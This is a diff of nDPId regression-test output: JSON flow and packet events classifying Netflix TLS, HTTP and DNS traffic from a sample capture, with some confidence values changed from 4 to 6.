+00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1957,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064711,"flow_last_seen":1484319064785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319064785,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1961,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064669,"flow_last_seen":1484319064796,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064796,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064671,"flow_last_seen":1484319064823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064823,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1964,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064669,"flow_last_seen":1484319064850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} 
+00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064711,"flow_last_seen":1484319064885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319064885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064671,"flow_last_seen":1484319064898,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064898,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1977,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064711,"flow_last_seen":1484319064950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319064950,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2494,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319070636,"flow_last_seen":1484319070636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319070636,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2494,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1484319070636,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319070636,"pkt":"gCqoTGHM5JjWH70UCABFAABAs25AAEAGoh\/AqAEHF\/YLhc\/aAFBx1HGxAAAAALAC\/\/84uwAAAgQFtAEDAwUBAQgKH2VGAgAAAAAEAgAA"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2497,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1484319070655,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319070655,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWnIX9guFwKgBBwBQz9pdV1SucdRxsqAS\/\/+\/OwAAAgQFtAEDAwkEAggKgYtW3h9lRgI="} 
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2499,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1484319070656,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319070656,"pkt":"gCqoTGHM5JjWH70UCABFAAA0S\/NAAEAGCafAqAEHF\/YLhc\/aAFBx1HGyXVdUr4AQEBXd4QAAAQEICh9lRhWBi1be"} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2501,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319070636,"flow_last_seen":1484319070660,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319070660,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} 
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2501,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319070636,"flow_last_seen":1484319070660,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319070660,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4214,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319091296,"flow_last_seen":1484319091296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319091296,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4214,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1484319091296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319091296,"pkt":"gCqoTGHM5JjWH70UCABFAABAakNAAEAG60LAqAEHF\/YLjc\/hAFDAgDYQAAAAALAC\/\/\/YUQAAAgQFtAEDAwUBAQgKH2WTUQAAAAAEAgAA"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4216,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1484319091309,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319091309,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz+FsswOfwIA2EaAS\/\/85DQAAAgQFtAEDAwkEAggK\/T5Cox9lk1E="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4217,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1484319091310,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319091310,"pkt":"gCqoTGHM5JjWH70UCABFAAA00UpAAEAGhEfAqAEHF\/YLjc\/hAFDAgDYRbLMDoIAQEBVXuAAAAQEICh9lk1\/9PkKj"} 
-01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4218,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319091296,"flow_last_seen":1484319091314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319091314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4218,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319091296,"flow_last_seen":1484319091314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319091314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1484319114365,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319114365,"pkt":"gCqoTGHM5JjWH70UCABFAABCZ6UAAEARj63AqAEHwKgBAcmmADUALqajKFkBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAE="} 
-00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6398,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1484319114365,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319114365,"pkt":"gCqoTGHM5JjWH70UCABFAABCN7AAAEARv6LAqAEHwKgBAcmmADUALiWYqUkBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAAcAAE="} -00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6398,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6398,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": 
{"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00750{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6401,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1484319114384,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1484319114384,"pkt":"5JjWH70UgCqoTGHMCABFAAEF4UpAAEAR1UTAqAEBwKgBBwA1yaYA8aaTKFmBgAABAAoAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAHADAAFAAEAAAAhAA8DaW9zBG5jY3ADZ2VvwBXAMgAFAAEAAAEXABwDaW9zBG5jY3AJdXMtd2VzdC0yBnByb2RhYcAVwE0AAQABAAAALwAENCAW1sBNAAEAAQAAAC8ABDQiMaPATQABAAEAAAAvAAQ0GyTuwE0AAQABAAAALwAENCJwJsBNAAEAAQAAAC8ABDQi04bATQABAAEAAAAvAAQ0GRpcwE0AAQABAAAALwAENCDSq8BNAAEAAQAAAC8ABDQi5lM="} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6401,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1484319114365,"flow_last_seen":1484319114384,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1484319114384,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":1,"rsp_addr":"52.32.22.214"}} 
+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6401,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1484319114365,"flow_last_seen":1484319114384,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1484319114384,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":1,"rsp_addr":"52.32.22.214"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6406,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114406,"flow_last_seen":1484319114406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319114406,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6406,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1484319114406,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319114406,"pkt":"gCqoTGHM5JjWH70UCABFAABAaktAAEAGw8fAqAEHNCAW1s\/2Abt+TgYJAAAAALAC\/\/\/LHgAAAgQFtAEDAwUBAQgKH2XpygAAAAAEAgAA"} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6412,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1484319114455,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319114455,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGRPc0IBbWwKgBBwG7z\/ZJSmsOfk4GCqASOJAVRAAAAgQFtAQCCAq2sSMxH2XpygEDAwg="} 